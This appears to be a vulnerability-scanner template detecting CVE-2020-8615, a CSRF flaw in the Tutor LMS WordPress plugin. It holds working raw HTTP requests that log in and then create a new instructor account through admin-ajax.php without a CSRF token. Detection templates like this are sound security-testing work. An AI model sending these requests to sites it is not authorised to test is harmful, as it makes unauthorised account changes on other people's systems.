id: CVE-2020-8615

info:
  name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
  author: r3Y3r53
  severity: medium
  description: |
    A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
  remediation: update to v.1.5.3
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8615
    - https://wpscan.com/vulnerability/10058
    - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cwe-id: CWE-352
    cve-id: CVE-2020-8615
    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/tutor/"
  tags: cve,cve2020,csrf,wp-plugin,wp,tutor,wordpress,wpscan

# Random values for the test instructor account created by the check
variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      # Request 1: log in with the supplied credentials to obtain a session cookie
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      # Request 2: state-changing AJAX call; the body carries no anti-CSRF token
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor

    cookie-reuse: true
    # Match only when the second response is a 200 JSON reply confirming the instructor was added
    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
          - 'status_code_2 == 200'
        condition: and